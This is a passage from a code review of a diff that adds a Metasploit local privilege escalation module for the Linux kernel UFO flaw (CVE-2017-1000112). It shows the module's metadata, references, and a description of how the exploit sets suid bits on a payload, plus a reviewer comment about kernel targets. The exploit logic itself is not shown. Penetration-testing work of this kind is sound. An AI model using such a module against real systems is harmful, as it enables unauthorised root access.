modules/exploits/linux/local/ufo_privilege_escalation.rb

```diff
@@ -0,0 +1,823 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::Linux::Priv
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => 'Linux Kernel UDP Fragmentation Offset (UFO) Local Privilege Escalation',
+        'Description'   => %q{
+          This module attempts to gain root privileges on Linux systems by abusing
+          UDP Fragmentation Offload (UFO).  In the original POC exploit, a bash shell
+          is executed with root privileges, however, in testing, it was determined that
+          the network stack seems to be unresponsive post exploitation to that process
+          and its children.  To circumvent this issue, this exploit calls a stub bash
+          script to chmod and set suid/sgid bits on the payload.  Then the original
+          shell can simply execute the payload to escalate.
+
+          This module has been tested successfully on Ubuntu 14.04.5 x64 Desktop.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        =>
+          [
+            'Andrey Konovalov <andreyknvl@gmail.com>', # discovery
+            'h00die',           # metasploit module
+            'Brendan Coles'     # metasploit module
+          ],
+        'Platform'      => [ 'linux' ],
+        'Arch'          => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes'  => [ 'shell', 'meterpreter' ],
+        'References'    =>
+          [
+            [ 'CVE', '2017-1000112' ],
+            [ 'EDB', '43418' ],
+            [ 'BID', '100262' ],
+            [ 'URL', 'http://seclists.org/oss-sec/2017/q3/277' ],
+            [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c' ],
+            [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa' ],
+            [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000112' ],
+            [ 'URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/linux-kernel-vulnerability-can-lead-to-privilege-escalation-analyzing-cve-2017-1000112/' ],
+            [ 'URL', 'https://ricklarabee.blogspot.com/2017/12/adapting-poc-for-cve-2017-1000112-to.html' ],
+            [ 'URL', 'https://github.com/xairy/kernel-exploits/pull/12' ] #bcoles addition of 4.8.0-53
```

Comment:
I'm tracking new kernel targets [here](https://github.com/bcoles/kernel-exploits/tree/cve-2017-1000112) and intend to add more.